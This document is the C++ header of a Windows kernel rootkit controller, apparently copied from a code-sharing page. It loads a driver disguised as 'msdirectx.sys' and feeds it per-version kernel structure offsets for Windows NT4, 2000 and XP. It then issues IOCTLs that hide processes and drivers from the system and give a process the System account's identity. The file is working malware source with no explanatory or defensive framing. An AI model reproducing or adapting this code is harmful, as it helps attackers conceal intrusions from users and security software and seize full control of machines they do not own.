📄 hideprocess.h
字号:
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winioctl.h>
#define FILE_DEVICE_ROOTKIT 0x00002a7b
#define IOCTL_ROOTKIT_INIT (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEME (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_LISTPROC (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x03, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_SETPRIV (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x05, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_SETAUTHID (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x04, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_SETSID (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x06, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_LISTDRIV (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x07, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEDRIV (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x08, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_TRANSFER_TYPE( _iocontrol) (_iocontrol & 0x3)
typedef struct _vars {
DWORD the_pid;
PLUID_AND_ATTRIBUTES pluida;
DWORD num_luids;
} VARS;
typedef struct _vars2 {
DWORD the_pid;
void * pSID;
DWORD d_SidSize;
} VARS2;
static BOOL Initialized = FALSE;
HANDLE gh_Device = INVALID_HANDLE_VALUE;
static CHAR ac_driverLabel[] = "msdirectx";
static CHAR ac_driverName[] = "msdirectx.sys";
class CHideProcess
{
BOOL InstallDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName, IN LPCTSTR ServiceExe )
{
SC_HANDLE schService;
//
// NOTE: This creates an entry for a standalone driver. If this
// is modified for use with a driver that requires a Tag,
// Group, and/or Dependencies, it may be necessary to
// query the registry for existing driver information
// (in order to determine a unique Tag, etc.).
//
schService = CreateService( SchSCManager, // SCManager database
DriverName, // name of service
DriverName, // name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_KERNEL_DRIVER, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
ServiceExe, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL // no password
);
if ( schService == NULL )
return FALSE;
CloseServiceHandle( schService );
return TRUE;
}
BOOL StartDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName )
{
SC_HANDLE schService;
BOOL ret;
schService = OpenService( SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
);
if ( schService == NULL )
return FALSE;
ret = StartService( schService, 0, NULL )
|| GetLastError() == ERROR_SERVICE_ALREADY_RUNNING
|| GetLastError() == ERROR_SERVICE_DISABLED;
CloseServiceHandle( schService );
return ret;
}
BOOL OpenDevice( IN LPCTSTR DriverName, HANDLE * lphDevice )
{
TCHAR completeDeviceName[64];
HANDLE hDevice;
//
// Create a \\.\XXX device name that CreateFile can use
//
// NOTE: We're making an assumption here that the driver
// has created a symbolic link using it's own name
// (i.e. if the driver has the name "XXX" we assume
// that it used IoCreateSymbolicLink to create a
// symbolic link "\DosDevices\XXX". Usually, there
// is this understanding between related apps/drivers.
//
// An application might also peruse the DEVICEMAP
// section of the registry, or use the QueryDosDevice
// API to enumerate the existing symbolic links in the
// system.
//
if( (GetVersion() & 0xFF) >= 5 ) {
//
// We reference the global name so that the application can
// be executed in Terminal Services sessions on Win2K
//
wsprintf( completeDeviceName, TEXT("\\\\.\\Global\\%s"), DriverName );
} else {
wsprintf( completeDeviceName, TEXT("\\\\.\\%s"), DriverName );
}
hDevice = CreateFile( completeDeviceName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if ( hDevice == ((HANDLE)-1) )
return FALSE;
// If user wants handle, give it to them. Otherwise, just close it.
if ( lphDevice )
*lphDevice = hDevice;
else
CloseHandle( hDevice );
return TRUE;
}
BOOL StopDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName )
{
SC_HANDLE schService;
BOOL ret;
SERVICE_STATUS serviceStatus;
schService = OpenService( SchSCManager, DriverName, SERVICE_ALL_ACCESS );
if ( schService == NULL )
return FALSE;
ret = ControlService( schService, SERVICE_CONTROL_STOP, &serviceStatus );
CloseServiceHandle( schService );
return ret;
}
BOOL RemoveDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName )
{
SC_HANDLE schService;
BOOL ret;
schService = OpenService( SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
);
if ( schService == NULL )
return FALSE;
ret = DeleteService( schService );
CloseServiceHandle( schService );
return ret;
}
DWORD SetAuthID(DWORD pid, PSID my_sid, DWORD sid_size)
{
DWORD d_bytesRead;
DWORD success;
VARS2 my_var;
if (!Initialized)
{
return ERROR_NOT_READY;
}
if ((pid == 0) || (my_sid == NULL) || (sid_size == 0))
return ERROR_INVALID_ADDRESS;
my_var.the_pid = pid;
my_var.pSID = my_sid;
my_var.d_SidSize = sid_size;
success = DeviceIoControl(gh_Device,
IOCTL_ROOTKIT_SETAUTHID,
(void *) &my_var,
sizeof(VARS2),
NULL,
0,
&d_bytesRead,
NULL);
return success;
}
public:
BOOL SetPrvToSystem(DWORD pid)
{
char *sname = "System";
DWORD d_SIDSize = 0;
DWORD d_domSize = 0;
LPTSTR lp_domName = NULL;
PSID my_SID = NULL;
PSID_NAME_USE sid_use = NULL;
BOOL success = FALSE;
LookupAccountName(NULL,
sname,
my_SID,
&d_SIDSize,
lp_domName,
&d_domSize,
sid_use);
my_SID = (PSID) calloc(1, d_SIDSize);
if (my_SID == NULL)
{
fprintf(stderr, "Failed to allocate memory!\n");
return FALSE;
}
lp_domName = (LPTSTR) calloc(1, d_domSize*sizeof(TCHAR));
if (lp_domName == NULL)
{
if(my_SID)
free(my_SID);
fprintf(stderr, "Failed to allocate memory!\n");
return FALSE;
}
sid_use = (_SID_NAME_USE *) calloc(1, sizeof(_SID_NAME_USE));
if (sid_use == NULL)
{
if(lp_domName)
free(lp_domName);
if(my_SID)
free(my_SID);
fprintf(stderr, "Failed to allocate memory!\n");
return FALSE;
}
success = LookupAccountName(NULL,
sname,
my_SID,
&d_SIDSize,
lp_domName,
&d_domSize,
sid_use);
if (!success)
{
fprintf(stderr, "Failed to lookup System SID.\n");
if(lp_domName)
free(lp_domName);
if(sid_use)
free(sid_use);
if(my_SID)
free(my_SID);
return FALSE;
}
SetAuthID(pid, my_SID, d_SIDSize);
if(lp_domName)
free(lp_domName);
if(sid_use)
free(sid_use);
if(my_SID)
free(my_SID);
return TRUE;
}
BOOL UnloadDeviceDriver( const TCHAR * Name )
{
SC_HANDLE schSCManager;
schSCManager = OpenSCManager( NULL, // machine (NULL == local)
NULL, // database (NULL == default)
SC_MANAGER_ALL_ACCESS // access required
);
StopDriver( schSCManager, Name );
RemoveDriver( schSCManager, Name );
CloseServiceHandle( schSCManager );
return TRUE;
}
BOOL LoadDeviceDriver( const TCHAR * Name, const TCHAR * Path,
HANDLE * lphDevice, PDWORD Error )
{
SC_HANDLE schSCManager;
BOOL okay;
schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS );
// Remove old instances
RemoveDriver( schSCManager, Name );
// Ignore success of installation: it may already be installed.
InstallDriver( schSCManager, Name, Path );
// Ignore success of start: it may already be started.
StartDriver( schSCManager, Name );
// Do make sure we can open it.
okay = OpenDevice( Name, lphDevice );
*Error = GetLastError();
CloseServiceHandle( schSCManager );
return okay;
}
DWORD InitDriver()
{
int iRetCode = ERROR_SUCCESS;
HANDLE h_Device = INVALID_HANDLE_VALUE;
DWORD d_bytesRead, d_error;
CHAR ac_driverPath[MAX_PATH];
OSVERSIONINFOEX osvi;
BOOL bOsVersionInfoEx;
BOOL Found = FALSE;
int pid_offset = 0;
int flink_offset = 0;
int authid_offset = 0;
int token_offset = 0;
int privcount_offset = 0;
int privaddr_offset = 0;
int sidcount_offset = 0;
int sidaddr_offset = 0;
DWORD modlisthead = 0; //You may need to CHANGE THIS VARIABLE!
int *os_offsets;
try
{
if (Initialized)
{
return iRetCode;
}
// Try calling GetVersionEx using the OSVERSIONINFOEX structure.
// If that fails, try using the OSVERSIONINFO structure.
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
if( !(bOsVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) &osvi)) )
{
// If OSVERSIONINFOEX doesn't work, try OSVERSIONINFO.
osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (! GetVersionEx ( (OSVERSIONINFO *) &osvi) )
return -1;
}
switch (osvi.dwPlatformId)
{
// Tests for Windows NT product family.
case VER_PLATFORM_WIN32_NT:
// Test for the product.
if ( osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 0)
{
//fprintf(stderr, "Microsoft Windows NT 4.0 ");
pid_offset = 148;
flink_offset = 152;
authid_offset = 24;
token_offset = 264;
privcount_offset = 52;
privaddr_offset = 80;
sidcount_offset = 48;
sidaddr_offset = 72;
Found = TRUE;
}
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0 )
{
//fprintf(stderr, "Microsoft Windows 2000 ");
pid_offset = 156;
flink_offset = 160;
authid_offset = 0x18;
token_offset = 0x12c;
privcount_offset = 0x44;
privaddr_offset = 0x64;
sidcount_offset = 0x3c;
sidaddr_offset = 0x58;
modlisthead = 0x8046e1b8; //Change me!
Found = TRUE;
}
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1 )
{
//fprintf(stderr, "Microsoft Windows XP ");
pid_offset = 132;
flink_offset = 136;
authid_offset = 24;
token_offset = 200;
privcount_offset = 72;
privaddr_offset = 104;
sidcount_offset = 64;
sidaddr_offset = 92;
modlisthead = 0x80543530; //Change me!
Found = TRUE;
}
// Display version, service pack (if any), and build number.
/*
if ( osvi.dwMajorVersion <= 4 )
{
fprintf(stderr, "version %d.%d %s (Build %d)\n",
osvi.dwMajorVersion,
osvi.dwMinorVersion,
osvi.szCSDVersion,
osvi.dwBuildNumber & 0xFFFF);
}
else
{
fprintf(stderr, "%s (Build %d)\n",
osvi.szCSDVersion,
osvi.dwBuildNumber & 0xFFFF);
}
*/
break;
default:
fprintf(stderr, "\nOperating System Version %d.%d Not Supported!\n", osvi.dwMajorVersion, osvi.dwMinorVersion);
return -1;
break; // Never executed
}
if (!Found)
{
fprintf(stderr, "\nOperating System Version %d.%d Not Supported!\n",
osvi.dwMajorVersion,
osvi.dwMinorVersion);
return -1;
}
else
{
if (GetSystemDirectory(ac_driverPath,MAX_PATH))
{
strncat(ac_driverPath, "\\", MAX_PATH-strlen(ac_driverPath));
strncat(ac_driverPath, ac_driverName, MAX_PATH-strlen(ac_driverPath));
}
LoadDeviceDriver(ac_driverLabel, ac_driverPath ,&h_Device, &d_error);
if (h_Device == INVALID_HANDLE_VALUE)
{
fprintf(stderr, "Unable to Load Driver");
throw d_error;
}
gh_Device = h_Device;
os_offsets = (int *)calloc(1, sizeof(int)*9);
if (!os_offsets)
{
fprintf(stderr, "Memory allocation failed.\n");
return -1;
}
memcpy(os_offsets, &pid_offset, sizeof(int));
memcpy(os_offsets + 1, &flink_offset, sizeof(int));
memcpy(os_offsets + 2, &authid_offset, sizeof(int));
memcpy(os_offsets + 3, &token_offset, sizeof(int));
memcpy(os_offsets + 4, &privcount_offset, sizeof(int));
memcpy(os_offsets + 5, &privaddr_offset, sizeof(int));
memcpy(os_offsets + 6, &sidcount_offset, sizeof(int));
memcpy(os_offsets + 7, &sidaddr_offset, sizeof(int));
memcpy(os_offsets + 8, &modlisthead, sizeof(DWORD));
if(!DeviceIoControl(gh_Device, IOCTL_ROOTKIT_INIT,
os_offsets,
sizeof(int)*9,
NULL,
0,
&d_bytesRead,
NULL))
{
fprintf(stderr, "Error Initializing Driver with offsets.\n");
throw;
}
if (os_offsets)
free(os_offsets);
}
}catch (DWORD error) {
LPVOID lpMsgBuf = NULL;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
NULL, error, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf, 0, NULL);
fprintf(stderr, "%s\n",lpMsgBuf);
if (lpMsgBuf)
LocalFree(lpMsgBuf);
return -1;
} catch (...) {
LPVOID lpMsgBuf = NULL;
DWORD error = 0;
error = GetLastError();
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
NULL, error, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf, 0, NULL);
fprintf(stderr, "%s\n",lpMsgBuf);
if (lpMsgBuf)
LocalFree(lpMsgBuf);
return -1;
}
Initialized = TRUE;
return (iRetCode);
} //InitDriver()
DWORD HideDriv(char *driver_name)
{
DWORD d_bytesRead;
DWORD success;
if (!Initialized)
{
return ERROR_NOT_READY;
}
success = DeviceIoControl(gh_Device,
IOCTL_ROOTKIT_HIDEDRIV,
(void *) driver_name,
(DWORD) strlen(driver_name),
NULL,
0,
&d_bytesRead,
NULL);
return success;
}
DWORD HideProc(DWORD pid)
{
DWORD d_bytesRead;
DWORD success;
if (!Initialized)
{
return ERROR_NOT_READY;
}
success = DeviceIoControl(gh_Device,
IOCTL_ROOTKIT_HIDEME,
(void *) &pid,
sizeof(DWORD),
NULL,
0,
&d_bytesRead,
NULL);
return success;
}
CHideProcess (){}
virtual ~CHideProcess (){}
};⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -